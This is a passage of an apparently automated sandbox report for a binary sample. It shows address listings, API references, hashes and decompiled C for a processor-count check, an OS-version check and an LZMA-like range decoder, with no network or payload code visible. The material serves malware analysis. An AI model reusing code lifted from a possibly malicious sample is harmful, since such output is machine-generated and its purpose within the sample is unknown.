                                                                                                                            0x0041065f
                                                                                                                            0x0041065f
                                                                                                                            0x00410661
                                                                                                                            0x00410664
                                                                                                                            0x0041066f
                                                                                                                            0x0041066f
                                                                                                                            0x00410672
                                                                                                                            0x00410675
                                                                                                                            0x00000000
                                                                                                                            0x00410675
                                                                                                                            0x0041064d
                                                                                                                            0x00410653
                                                                                                                            0x00410656
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00410658
                                                                                                                            0x0041065a
                                                                                                                            0x00000000
                                                                                                                            0x0041065a
                                                                                                                            0x004106b5
                                                                                                                            0x004106b5
                                                                                                                            0x004106b9
                                                                                                                            0x004106bb
                                                                                                                            0x004106c1
                                                                                                                            0x004106c1
                                                                                                                            0x004106c4
                                                                                                                            0x004106c8
                                                                                                                            0x004106c9
                                                                                                                            0x004106cc
                                                                                                                            0x004106cc
                                                                                                                            0x00000000
                                                                                                                            0x00410606
                                                                                                                            0x004105fd
                                                                                                                            0x004102ae
                                                                                                                            0x004102b0
                                                                                                                            0x004102b6
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004102bd
                                                                                                                            0x00000000
                                                                                                                            0x004102bd
                                                                                                                            0x00410272
                                                                                                                            0x00410197
                                                                                                                            0x0041019a
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0041019f
                                                                                                                            0x004101a5
                                                                                                                            0x004101a6
                                                                                                                            0x004101a7
                                                                                                                            0x004101af
                                                                                                                            0x004101b5
                                                                                                                            0x004101bc
                                                                                                                            0x004101bf
                                                                                                                            0x004101e1
                                                                                                                            0x004101e3
                                                                                                                            0x004101ee
                                                                                                                            0x004101f1
                                                                                                                            0x004101f4
                                                                                                                            0x004101f4
                                                                                                                            0x00000000
                                                                                                                            0x004101f4
                                                                                                                            0x004101c1
                                                                                                                            0x004101c8
                                                                                                                            0x004101cd
                                                                                                                            0x00000000

                                                                                                                            APIs
                                                                                                                            • __EH_prolog.LIBCMT ref: 0041013D
                                                                                                                              • Part of subcall function 0040E966: _CxxThrowException.MSVCRT(?,0041DDD8), ref: 0040E979
                                                                                                                              • Part of subcall function 0040E9D2: memcpy.MSVCRT ref: 0040E9F8
                                                                                                                            • _CxxThrowException.MSVCRT(?,0041DE18), ref: 004105B1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.289596243.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.289591053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289613327.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289618199.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289623098.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_T4IoJqcAwY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExceptionThrow$H_prologmemcpy
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3273695820-0
                                                                                                                            • Opcode ID: 8608d0076eec31eca5f0e81755e1f876d4cdaf6c97ca9a4aa084ed0ad63cd1ce
                                                                                                                            • Instruction ID: 1e1c7e61ba698c275f7f534d06f4bc4e9de0f72c169ee7f0706794f77a0469e0
                                                                                                                            • Opcode Fuzzy Hash: 8608d0076eec31eca5f0e81755e1f876d4cdaf6c97ca9a4aa084ed0ad63cd1ce
                                                                                                                            • Instruction Fuzzy Hash: E0225B70900209EFCB14DFA5C580BEEBBB1BF49304F14806EE449A7292DB78AAD5CF55
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00405FE9 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E00405FE9() {
				char _v12;
				struct _SYSTEM_INFO _v48;

				if(E00405FD6( &_v12) == 0) {
					L3:
					GetSystemInfo( &_v48);
					return _v48.dwNumberOfProcessors;
				} else {
					_t10 = _v12;
					if(_v12 == 0) {
						goto L3;
					} else {
						return E00405FBE(_t10);
					}
				}
			}





                                                                                                                            0x00405ff9
                                                                                                                            0x00406009
                                                                                                                            0x0040600d
                                                                                                                            0x00406017
                                                                                                                            0x00405ffb
                                                                                                                            0x00405ffb
                                                                                                                            0x00406000
                                                                                                                            0x00000000
                                                                                                                            0x00406002
                                                                                                                            0x00406008
                                                                                                                            0x00406008
                                                                                                                            0x00406000

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00405FD6: GetCurrentProcess.KERNEL32(?,?,00405FF7), ref: 00405FDB
                                                                                                                              • Part of subcall function 00405FD6: GetProcessAffinityMask.KERNEL32 ref: 00405FE2
                                                                                                                            • GetSystemInfo.KERNEL32(?), ref: 0040600D
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.289596243.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.289591053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289613327.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289618199.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289623098.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_T4IoJqcAwY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Process$AffinityCurrentInfoMaskSystem
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3251479945-0
                                                                                                                            • Opcode ID: 9638cc95e3299b83821e6c84bee8aa3ccb8c6e68d8bff0197413b8266dbdf947
                                                                                                                            • Instruction ID: a595d45d0e218688a76e62c7e93015bc085ee55c95d1e1a04d1298ad9275ef66
                                                                                                                            • Opcode Fuzzy Hash: 9638cc95e3299b83821e6c84bee8aa3ccb8c6e68d8bff0197413b8266dbdf947
                                                                                                                            • Instruction Fuzzy Hash: F0D01230A0120A97DF04EBE6D4469EFB7789E4424CF04407ED902F21D1EB78D5448B65
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00401951 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E00401951() {
				struct _OSVERSIONINFOW _v280;
				void* _t7;

				_v280.dwOSVersionInfoSize = 0x114;
				if(GetVersionExW( &_v280) == 0 || _v280.dwPlatformId != 2) {
					return 0;
				} else {
					_t7 = 1;
					return _t7;
				}
			}





                                                                                                                            0x00401960
                                                                                                                            0x00401973
                                                                                                                            0x00401986
                                                                                                                            0x0040197e
                                                                                                                            0x00401980
                                                                                                                            0x00401982
                                                                                                                            0x00401982

                                                                                                                            APIs
                                                                                                                            • GetVersionExW.KERNEL32(?), ref: 0040196B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.289596243.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.289591053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289613327.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289618199.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289623098.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_T4IoJqcAwY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Version
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1889659487-0
                                                                                                                            • Opcode ID: 3796a73e287461f867f45a08f1f6e5757d9a1514d5947a266d71f92e6a93000a
                                                                                                                            • Instruction ID: 5ea60d680a3723cf7479c9b9c674eb7bbe69d84cac2f3f11a719c8fc44cf451d
                                                                                                                            • Opcode Fuzzy Hash: 3796a73e287461f867f45a08f1f6e5757d9a1514d5947a266d71f92e6a93000a
                                                                                                                            • Instruction Fuzzy Hash: F7D05EB0A0020C47DF349B20ED1B7CBB6E8A700F48F0041F19A05F22C0E6B8DA89CDA5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00417F4E Relevance: .7, Instructions: 746COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.289596243.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.289591053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289613327.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289618199.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289623098.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_T4IoJqcAwY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 4303dd119ba1ed7c3d628978d191b0722151b84e2ae4267017ea45087309646a
                                                                                                                            • Instruction ID: 9ad6d3b81e8545ea398e4b1071118a8dd43145011e8565021be78d6510a2f67f
                                                                                                                            • Opcode Fuzzy Hash: 4303dd119ba1ed7c3d628978d191b0722151b84e2ae4267017ea45087309646a
                                                                                                                            • Instruction Fuzzy Hash: 9B620571A083458FCB24CF19C4805ABFBE2BFC8744F244A6EE89987355DB75D885CB4A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00416C70 Relevance: .5, Instructions: 480COMMONCrypto
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E00416C70(void* __eax, signed char* __ecx, signed char* _a4) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed char* _v20;
				intOrPtr _t158;
				unsigned int _t162;
				signed int _t165;
				signed int _t166;
				intOrPtr _t167;
				signed int _t168;
				signed int _t169;
				signed char* _t170;
				signed int _t172;
				signed char* _t173;
				signed char* _t176;
				signed char* _t178;
				signed char* _t180;
				signed char _t191;
				signed int _t192;
				unsigned int _t198;
				signed char* _t199;
				signed int _t204;
				signed char* _t205;
				signed char* _t207;
				signed int _t213;
				signed short* _t214;
				signed int _t215;
				signed int _t222;
				signed char _t228;
				signed int _t229;
				signed int _t235;
				signed char* _t237;
				signed int _t240;
				signed int _t244;
				signed int _t247;
				signed int _t250;
				signed int _t253;
				signed int _t256;
				signed int _t259;
				signed char _t263;
				void* _t264;
				intOrPtr _t265;
				signed int _t267;
				signed char _t279;
				signed char _t284;
				signed int _t285;
				signed int _t286;
				signed int _t288;
				signed int _t289;
				signed int _t290;
				signed int _t291;
				signed int _t292;
				signed int _t293;
				signed int _t294;
				signed int _t295;
				unsigned int _t296;
				signed char* _t297;
				intOrPtr _t298;
				signed char* _t299;
				signed short* _t301;
				signed int _t302;
				signed int _t303;
				signed int _t304;
				signed int _t305;
				signed char* _t306;
				signed int _t309;
				signed int _t316;
				signed int _t321;
				signed int _t322;
				signed int _t323;
				signed int _t324;
				signed int _t325;
				signed int _t326;
				signed int _t327;
				signed int _t342;
				signed int _t343;
				signed char _t344;
				void* _t348;
				signed int _t349;

				_t297 = __ecx;
				_t342 =  *(__ecx + 0x40);
				_t288 =  *(__ecx + 0x20);
				_t323 =  *(__ecx + 0x24);
				_t158 =  *((intOrPtr*)(__ecx + 0xc));
				_v20 =  &(_a4[__eax]);
				_v16 = _t158;
				_t213 = ((0x00000001 <<  *(__ecx + 2)) - 0x00000001 &  *(__ecx + 0x28)) << 4;
				_t235 = 1 + _t342;
				_v4 = _t235;
				_v12 =  *(_t158 + _t235 * 2 - 0x200) & 0x0000ffff;
				if(_t288 >= 0x1000000) {
					L4:
					_t162 = (_t288 >> 0xb) * _v12;
					if(_t323 >= _t162) {
						_t298 = _v16;
						_t289 = _t288 - _t162;
						_t324 = _t323 - _t162;
						_v12 =  *(_t298 + 0x20 + _t342 * 2) & 0x0000ffff;
						_t237 = _a4;
						if(_t289 >= 0x1000000) {
							L39:
							_t165 = (_t289 >> 0xb) * _v12;
							if(_t324 >= _t165) {
								_t290 = _t289 - _t165;
								_t325 = _t324 - _t165;
								_t166 =  *(_t298 + 0x38 + _t342 * 2) & 0x0000ffff;
								_v8 = 3;
								if(_t290 >= 0x1000000) {
									L44:
									_t240 = (_t290 >> 0xb) * _t166;
									_t167 = _v16;
									if(_t325 >= _t240) {
										_t299 = _a4;
										_t291 = _t290 - _t240;
										_t326 = _t325 - _t240;
										_v12 =  *(_t167 + 0x50 + _t342 * 2) & 0x0000ffff;
										if(_t291 >= 0x1000000) {
											L55:
											_t244 = (_t291 >> 0xb) * _v12;
											if(_t326 >= _t244) {
												_t168 =  *(_t167 + 0x68 + _t342 * 2) & 0x0000ffff;
												_t292 = _t291 - _t244;
												_t325 = _t326 - _t244;
												if(_t292 >= 0x1000000) {
													L60:
													_t247 = (_t292 >> 0xb) * _t168;
													if(_t325 >= _t247) {
														goto L62;
													} else {
														_t293 = _t247;
													}
													goto L63;
												} else {
													if(_t299 >= _v20) {
														goto L2;
													} else {
														_t292 = _t292 << 8;
														_t325 = _t325 << 0x00000008 |  *_t299 & 0x000000ff;
														_a4 =  &(_t299[1]);
														goto L60;
													}
												}
											} else {
												_t293 = _t244;
												goto L63;
											}
										} else {
											if(_t299 >= _v20) {
												goto L2;
											} else {
												_t291 = _t291 << 8;
												_t326 = _t326 << 0x00000008 |  *_t299 & 0x000000ff;
												_t299 =  &(_t299[1]);
												_a4 = _t299;
												goto L55;
											}
										}
									} else {
										_t316 =  *(_t167 + _v4 * 2 - 0xc00) & 0x0000ffff;
										_t180 = _a4;
										_t292 = _t240;
										if(_t240 >= 0x1000000) {
											L48:
											_t247 = (_t292 >> 0xb) * _t316;
											if(_t325 >= _t247) {
												L62:
												_t293 = _t292 - _t247;
												_t325 = _t325 - _t247;
												L63:
												_t237 = _a4;
												_v4 = 0xc;
												_t301 = _v16 + 0xfffff600;
												goto L64;
											} else {
												if(_t247 >= 0x1000000 || _t180 < _v20) {
													return 3;
												} else {
													goto L2;
												}
											}
										} else {
											if(_t180 >= _v20) {
												goto L2;
											} else {
												_t292 = _t240 << 8;
												_t325 = _t325 << 0x00000008 |  *_t180 & 0x000000ff;
												_t180 =  &(_t180[1]);
												_a4 = _t180;
												goto L48;
											}
										}
									}
								} else {
									if(_t237 >= _v20) {
										goto L2;
									} else {
										_t290 = _t290 << 8;
										_t325 = _t325 << 0x00000008 |  *_t237 & 0x000000ff;
										_a4 =  &(_t237[1]);
										goto L44;
									}
								}
							} else {
								_t293 = _t165;
								_v4 = 0;
								_t301 = _t298 + 0xfffffa00;
								_v8 = 2;
								L64:
								_t169 =  *_t301 & 0x0000ffff;
								if(_t293 >= 0x1000000) {
									L67:
									_t250 = (_t293 >> 0xb) * _t169;
									_t170 = _a4;
									if(_t325 >= _t250) {
										_t343 = _t301[8] & 0x0000ffff;
										_t294 = _t293 - _t250;
										_t327 = _t325 - _t250;
										if(_t294 >= 0x1000000) {
											L72:
											_t253 = (_t294 >> 0xb) * _t343;
											if(_t327 >= _t253) {
												_t295 = _t294 - _t253;
												_t327 = _t327 - _t253;
												_t214 =  &(_t301[0x100]);
												_t344 = 0x10;
												_v12 = 0x100;
											} else {
												_t344 = 8;
												_t295 = _t253;
												_t214 = _t301 + 0x10 + _t213 * 2;
												_v12 = 8;
											}
											goto L75;
										} else {
											if(_t170 >= _v20) {
												goto L2;
											} else {
												_t294 = _t294 << 8;
												_t327 = _t327 << 0x00000008 |  *_t170 & 0x000000ff;
												_t170 =  &(_t170[1]);
												_a4 = _t170;
												goto L72;
											}
										}
									} else {
										_t295 = _t250;
										_t214 =  &(_t301[_t213]);
										_t344 = 0;
										_v12 = 8;
										L75:
										_t302 = 1;
										L76:
										while(1) {
											if(_t295 >= 0x1000000) {
												L79:
												_t256 = (_t295 >> 0xb) * (_t214[_t302] & 0x0000ffff);
												if(_t327 >= _t256) {
													_t295 = _t295 - _t256;
													_t327 = _t327 - _t256;
													_t302 = _t302 + _t302 + 1;
												} else {
													_t295 = _t256;
													_t302 = _t302 + _t302;
												}
												_t172 = _v12;
												if(_t302 >= _t172) {
													_t303 = _t302 + _t344 - _t172;
													if(_v4 >= 4) {
														goto L32;
													} else {
														if(_t303 >= 3) {
															_t303 = 3;
														}
														_t173 = _a4;
														_t129 = _t303 + 1; // 0x4
														_t348 = (_t129 << 7) + _v16;
														_t304 = 1;
														do {
															_t215 =  *(_t348 + _t304 * 2) & 0x0000ffff;
															if(_t295 >= 0x1000000) {
																goto L91;
															} else {
																_t176 = _a4;
																if(_t176 >= _v20) {
																	goto L2;
																} else {
																	_t295 = _t295 << 8;
																	_t327 = _t327 << 0x00000008 |  *_t176 & 0x000000ff;
																	_t173 =  &(_t176[1]);
																	_a4 = _t173;
																	goto L91;
																}
															}
															goto L113;
															L91:
															_t259 = (_t295 >> 0xb) * _t215;
															if(_t327 >= _t259) {
																_t295 = _t295 - _t259;
																_t327 = _t327 - _t259;
																_t304 = _t304 + _t304 + 1;
															} else {
																_t295 = _t259;
																_t304 = _t304 + _t304;
															}
														} while (_t304 < 0x40);
														_t305 = _t304 - 0x40;
														if(_t305 < 4) {
															goto L33;
														} else {
															_t263 = (_t305 >> 1) - 1;
															_v12 = _t263;
															if(_t305 >= 0xe) {
																_t306 = _v20;
																_t264 = _t263 - 4;
																do {
																	if(_t295 >= 0x1000000) {
																		goto L102;
																	} else {
																		if(_t173 >= _t306) {
																			goto L2;
																		} else {
																			_t295 = _t295 << 8;
																			_t327 = _t327 << 0x00000008 |  *_t173 & 0x000000ff;
																			_t173 =  &(_t173[1]);
																			goto L102;
																		}
																	}
																	goto L113;
																	L102:
																	_t295 = _t295 >> 1;
																	_t327 = _t327 - ((_t327 - _t295 >> 0x0000001f) - 0x00000001 & _t295);
																	_t264 = _t264 - 1;
																} while (_t264 != 0);
																_t265 = _v16;
																_a4 = _t173;
																_v12 = 4;
																goto L104;
															} else {
																_t265 = _v16 + ((_t305 & 0x00000001 | 0x00000002) << _t263) * 2 - 0xd00;
																L104:
																_t349 = 1;
																_v16 = _t265;
																_t222 = 1;
																do {
																	_t267 =  *(_v16 + _t349 * 2) & 0x0000ffff;
																	if(_t295 >= 0x1000000) {
																		goto L108;
																	} else {
																		if(_a4 >= _v20) {
																			goto L2;
																		} else {
																			_t178 = _a4;
																			_t295 = _t295 << 8;
																			_t327 = _t327 << 0x00000008 |  *_t178 & 0x000000ff;
																			_t173 =  &(_t178[1]);
																			_a4 = _t173;
																			goto L108;
																		}
																	}
																	goto L113;
																	L108:
																	_t309 = (_t295 >> 0xb) * _t267;
																	if(_t327 >= _t309) {
																		_t222 = _t222 + _t222;
																		_t295 = _t295 - _t309;
																		_t327 = _t327 - _t309;
																		_t349 = _t349 + _t222;
																	} else {
																		_t349 = _t349 + _t222;
																		_t295 = _t309;
																		_t222 = _t222 + _t222;
																	}
																	_t155 =  &_v12;
																	 *_t155 = _v12 - 1;
																} while ( *_t155 != 0);
																goto L33;
															}
														}
													}
												} else {
													_t170 = _a4;
													continue;
												}
											} else {
												if(_t170 >= _v20) {
													goto L2;
												} else {
													_t295 = _t295 << 8;
													_t327 = _t327 << 0x00000008 |  *_t170 & 0x000000ff;
													_a4 =  &(_t170[1]);
													goto L79;
												}
											}
											goto L113;
										}
									}
								} else {
									if(_t237 >= _v20) {
										goto L2;
									} else {
										_t293 = _t293 << 8;
										_t325 = _t325 << 0x00000008 |  *_t237 & 0x000000ff;
										_a4 =  &(_t237[1]);
										goto L67;
									}
								}
							}
						} else {
							if(_t237 >= _v20) {
								goto L2;
							} else {
								_t289 = _t289 << 8;
								_t324 = _t324 << 0x00000008 |  *_t237 & 0x000000ff;
								_t237 =  &(_t237[1]);
								_a4 = _t237;
								goto L39;
							}
						}
					} else {
						_t296 = _t162;
						_v16 = _v16 + 0x280;
						if(_t297[0x2c] != 0 || _t297[0x28] != 0) {
							_t279 = _t297[0x18];
							if(_t279 == 0) {
								_t279 = _t297[0x14];
							}
							_v16 = _v16 + ((( *(_t297[0x10] + _t279 - 1) & 0x000000ff) >> 8 - ( *_t297 & 0x000000ff)) + (((0x00000001 << _t297[1]) - 0x00000001 & _t297[0x28]) << ( *_t297 & 0x000000ff))) * 0x600;
						}
						if(_t342 >= 7) {
							_t284 = _t297[0x18];
							_t228 = _t297[0x30];
							if(_t284 >= _t228) {
								_t191 = 0;
							} else {
								_t191 = _t297[0x14];
							}
							_t229 =  *(_t297[0x10] - _t228 + _t284 + _t191) & 0x000000ff;
							_t321 = 0x100;
							_t285 = 1;
							do {
								_t192 = _t321;
								_t229 = _t229 + _t229;
								_v4 = _t192;
								_t321 = _t321 & _t229;
								_v12 =  *(_v16 + (_t192 + _t285 + _t321) * 2) & 0x0000ffff;
								if(_t296 >= 0x1000000) {
									goto L27;
								} else {
									_t199 = _a4;
									if(_t199 >= _v20) {
										goto L2;
									} else {
										_t296 = _t296 << 8;
										_t323 = _t323 << 0x00000008 |  *_t199 & 0x000000ff;
										_a4 =  &(_t199[1]);
										goto L27;
									}
								}
								goto L113;
								L27:
								_t198 = (_t296 >> 0xb) * _v12;
								if(_t323 >= _t198) {
									_t296 = _t296 - _t198;
									_t323 = _t323 - _t198;
									_t285 = _t285 + _t285 + 1;
								} else {
									_t285 = _t285 + _t285;
									_t321 = _t321 ^ _v4;
									_t296 = _t198;
								}
							} while (_t285 < 0x100);
							goto L31;
						} else {
							_t286 = 1;
							do {
								_t322 =  *(_v16 + _t286 * 2) & 0x0000ffff;
								if(_t296 >= 0x1000000) {
									goto L15;
								} else {
									_t205 = _a4;
									if(_t205 >= _v20) {
										goto L2;
									} else {
										_t296 = _t296 << 8;
										_t323 = _t323 << 0x00000008 |  *_t205 & 0x000000ff;
										_a4 =  &(_t205[1]);
										goto L15;
									}
								}
								goto L113;
								L15:
								_t204 = (_t296 >> 0xb) * _t322;
								if(_t323 >= _t204) {
									_t296 = _t296 - _t204;
									_t323 = _t323 - _t204;
									_t286 = _t286 + _t286 + 1;
								} else {
									_t296 = _t204;
									_t286 = _t286 + _t286;
								}
							} while (_t286 < 0x100);
							L31:
							_v8 = 1;
							L32:
							_t173 = _a4;
							L33:
							if(_t295 >= 0x1000000 || _t173 < _v20) {
								return _v8;
							} else {
								goto L2;
							}
						}
					}
				} else {
					_t207 = _a4;
					if(_t207 < _v20) {
						_t288 = _t288 << 8;
						_t323 = _t323 << 0x00000008 |  *_t207 & 0x000000ff;
						_a4 =  &(_t207[1]);
						goto L4;
					} else {
						L2:
						return 0;
					}
				}
				L113:
			}



















































































                                                                                                                            0x00416c77
                                                                                                                            0x00416c7d
                                                                                                                            0x00416c80
                                                                                                                            0x00416c83
                                                                                                                            0x00416c88
                                                                                                                            0x00416c8b
                                                                                                                            0x00416c99
                                                                                                                            0x00416ca1
                                                                                                                            0x00416ca4
                                                                                                                            0x00416caf
                                                                                                                            0x00416cb3
                                                                                                                            0x00416cbd
                                                                                                                            0x00416ce5
                                                                                                                            0x00416cea
                                                                                                                            0x00416cf1
                                                                                                                            0x00416e75
                                                                                                                            0x00416e7e
                                                                                                                            0x00416e80
                                                                                                                            0x00416e82
                                                                                                                            0x00416e86
                                                                                                                            0x00416e90
                                                                                                                            0x00416eac
                                                                                                                            0x00416eb1
                                                                                                                            0x00416eb8
                                                                                                                            0x00416ed7
                                                                                                                            0x00416ed9
                                                                                                                            0x00416edb
                                                                                                                            0x00416ee0
                                                                                                                            0x00416eee
                                                                                                                            0x00416f0a
                                                                                                                            0x00416f0f
                                                                                                                            0x00416f12
                                                                                                                            0x00416f18
                                                                                                                            0x00416f81
                                                                                                                            0x00416f85
                                                                                                                            0x00416f87
                                                                                                                            0x00416f8e
                                                                                                                            0x00416f98
                                                                                                                            0x00416fb4
                                                                                                                            0x00416fb9
                                                                                                                            0x00416fc0
                                                                                                                            0x00416fc6
                                                                                                                            0x00416fcb
                                                                                                                            0x00416fcd
                                                                                                                            0x00416fd5
                                                                                                                            0x00416ff1
                                                                                                                            0x00416ff6
                                                                                                                            0x00416ffb
                                                                                                                            0x00000000
                                                                                                                            0x00416ffd
                                                                                                                            0x00416ffd
                                                                                                                            0x00416ffd
                                                                                                                            0x00000000
                                                                                                                            0x00416fd7
                                                                                                                            0x00416fdb
                                                                                                                            0x00000000
                                                                                                                            0x00416fe1
                                                                                                                            0x00416fe7
                                                                                                                            0x00416fea
                                                                                                                            0x00416fed
                                                                                                                            0x00000000
                                                                                                                            0x00416fed
                                                                                                                            0x00416fdb
                                                                                                                            0x00416fc2
                                                                                                                            0x00416fc2
                                                                                                                            0x00000000
                                                                                                                            0x00416fc2
                                                                                                                            0x00416f9a
                                                                                                                            0x00416f9e
                                                                                                                            0x00000000
                                                                                                                            0x00416fa4
                                                                                                                            0x00416faa
                                                                                                                            0x00416fad
                                                                                                                            0x00416faf
                                                                                                                            0x00416fb0
                                                                                                                            0x00000000
                                                                                                                            0x00416fb0
                                                                                                                            0x00416f9e
                                                                                                                            0x00416f1a
                                                                                                                            0x00416f1e
                                                                                                                            0x00416f26
                                                                                                                            0x00416f2a
                                                                                                                            0x00416f32
                                                                                                                            0x00416f50
                                                                                                                            0x00416f55
                                                                                                                            0x00416f5a
                                                                                                                            0x00417001
                                                                                                                            0x00417001
                                                                                                                            0x00417003
                                                                                                                            0x00417005
                                                                                                                            0x00417009
                                                                                                                            0x0041700d
                                                                                                                            0x00417015
                                                                                                                            0x00000000
                                                                                                                            0x00416f60
                                                                                                                            0x00416f66
                                                                                                                            0x00416f7e
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00416f66
                                                                                                                            0x00416f34
                                                                                                                            0x00416f38
                                                                                                                            0x00000000
                                                                                                                            0x00416f3e
                                                                                                                            0x00416f41
                                                                                                                            0x00416f49
                                                                                                                            0x00416f4b
                                                                                                                            0x00416f4c
                                                                                                                            0x00000000
                                                                                                                            0x00416f4c
                                                                                                                            0x00416f38
                                                                                                                            0x00416f32
                                                                                                                            0x00416ef0
                                                                                                                            0x00416ef4
                                                                                                                            0x00000000
                                                                                                                            0x00416efa
                                                                                                                            0x00416f00
                                                                                                                            0x00416f03
                                                                                                                            0x00416f06
                                                                                                                            0x00000000
                                                                                                                            0x00416f06
                                                                                                                            0x00416ef4
                                                                                                                            0x00416eba
                                                                                                                            0x00416eba
                                                                                                                            0x00416ebc
                                                                                                                            0x00416ec4
                                                                                                                            0x00416eca
                                                                                                                            0x0041701b
                                                                                                                            0x0041701b
                                                                                                                            0x00417024
                                                                                                                            0x00417040
                                                                                                                            0x00417045
                                                                                                                            0x00417048
                                                                                                                            0x0041704e
                                                                                                                            0x00417061
                                                                                                                            0x00417065
                                                                                                                            0x00417067
                                                                                                                            0x0041706f
                                                                                                                            0x0041708b
                                                                                                                            0x00417090
                                                                                                                            0x00417095
                                                                                                                            0x004170a8
                                                                                                                            0x004170aa
                                                                                                                            0x004170ac
                                                                                                                            0x004170b2
                                                                                                                            0x004170b7
                                                                                                                            0x00417097
                                                                                                                            0x00417097
                                                                                                                            0x0041709c
                                                                                                                            0x0041709e
                                                                                                                            0x004170a2
                                                                                                                            0x004170a2
                                                                                                                            0x00000000
                                                                                                                            0x00417071
                                                                                                                            0x00417075
                                                                                                                            0x00000000
                                                                                                                            0x0041707b
                                                                                                                            0x00417081
                                                                                                                            0x00417084
                                                                                                                            0x00417086
                                                                                                                            0x00417087
                                                                                                                            0x00000000
                                                                                                                            0x00417087
                                                                                                                            0x00417075
                                                                                                                            0x00417050
                                                                                                                            0x00417050
                                                                                                                            0x00417052
                                                                                                                            0x00417055
                                                                                                                            0x00417057
                                                                                                                            0x004170bf
                                                                                                                            0x004170bf
                                                                                                                            0x00000000
                                                                                                                            0x004170c4
                                                                                                                            0x004170ca
                                                                                                                            0x004170e6
                                                                                                                            0x004170ef
                                                                                                                            0x004170f4
                                                                                                                            0x004170fc
                                                                                                                            0x004170fe
                                                                                                                            0x00417100
                                                                                                                            0x004170f6
                                                                                                                            0x004170f6
                                                                                                                            0x004170f8
                                                                                                                            0x004170f8
                                                                                                                            0x00417104
                                                                                                                            0x0041710a
                                                                                                                            0x00417114
                                                                                                                            0x0041711b
                                                                                                                            0x00000000
                                                                                                                            0x00417121
                                                                                                                            0x00417124
                                                                                                                            0x00417126
                                                                                                                            0x00417126
                                                                                                                            0x0041712b
                                                                                                                            0x0041712f
                                                                                                                            0x00417135
                                                                                                                            0x00417139
                                                                                                                            0x00417140
                                                                                                                            0x00417140
                                                                                                                            0x0041714b
                                                                                                                            0x00000000
                                                                                                                            0x0041714d
                                                                                                                            0x0041714d
                                                                                                                            0x00417155
                                                                                                                            0x00000000
                                                                                                                            0x0041715b
                                                                                                                            0x00417161
                                                                                                                            0x00417164
                                                                                                                            0x00417166
                                                                                                                            0x00417167
